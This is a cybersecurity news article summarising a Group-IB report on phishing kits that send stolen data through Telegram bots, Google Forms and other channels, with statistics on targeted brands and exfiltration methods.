Recently, researchers have discovered that cybercriminals have used Telegram bots and Google Forms to automate phishing. Read on to know more about it…
Online scams are rising at an exponential rate, and cyber crooks have discovered a way to steal data from phishing attacks by leveraging legitimate services. The concept of cybercrime-as-a-model has gained a lot of traction among cybercriminals, and these platforms are based on it.
Hackers have been known to sell data stolen during malicious campaigns using popular messaging platforms. As a result, more groups have begun to use this model, broadening the spectrum of threat activity.
Google Forms and Telegram Bots
According to a new report from cybersecurity firm Group-IB, threat actors are using Google Forms and Telegram as alternate methods of collecting stolen data and putting it to use immediately. Telegram bots are also used in automated phishing sites on the dark web. The admin panel takes care of the overall phishing attack as well as any financial records with it.
The methods used to develop the phishing toolkits were thoroughly examined by Group-IB’s CERT. They found that, by 2020, the majority of toolkits were being used to emulate online services, such as online tools to view documents, online shopping, streaming services, and so on.
Commenting on the development, Yaroslav Kargalev, Deputy Head of CERT-GIB, said “Phishing kits have changed the rules of the game in this segment of the fight against cybercrime. In the past, cybercriminals stopped their campaigns after the fraudulent resources had been blocked and quickly switched to other brands. Today, they automate their attacks and instantly replace the blocked phishing websites with new web pages. In turn, automating such attacks leads to the spread of more complex social engineering used in large-scale attacks rather than separate incidents, as used to be the case. This keeps one of the oldest cybercriminal professions afloat.”
Functionality of Phishing Kits
Phishing kits are capable of more than just creating fake websites or pages in order to steal user data. Some of them infect the victim’s computer with malicious payloads. Sellers of phishing toolkits have been known to use this tactic to trick their customers and make money twice.
Hackers can direct stolen data to their network hosts or intercept access to the customers’ hosting service by using a special script inserted in the phishing kit’s text body.
Some Statistics
Last year, phishing kits targeted over 260 different brands. The most popular use of these kits was to create web pages that imitated online services. With 30.7 percent, online platforms were the most targeted, followed by financial institutions with 20 percent. The most popular method of harvesting phishing websites (66 percent) is through free emails. The majority of them were made with Yandex or Gmail.
Data can be gathered by hackers in two ways, locally and remotely. Alternative methods of compromising data account for 6% of all accidents. With the launch of phishing kits, the battle against cybercrime has become more difficult. Attacks are now automated, and blocked websites are replaced with new web pages almost immediately.
New Trend of Phishing Automation
Automation was used by hackers to replace blocked phishing websites, enabling them to carry out large-scale and complex phishing attacks. Traditional methods of phishing attack prevention are becoming less successful as a result of the current trend. Alternative approaches were often more dependable than email addresses, which could be blocked or hijacked.
It was found that hackers saved stolen data in a local file in the phishing resources or kits. Among the alternative methods, this was the most popular, accounting for 2.6 percent of all exfiltration methods. 1.6 percent were remote servers, 0.8 percent were Telegram bots, and 0.6 percent were MySQL databases.
Concluding Words
All of the latest strategies and techniques developed by threat actors demonstrate that the traditional approach to tracking and blocking phishing websites is insufficient. The automation of these attacks could lead to the spread of sophisticated social engineering techniques used in large-scale attacks, perpetuating the age-old threat of phishing.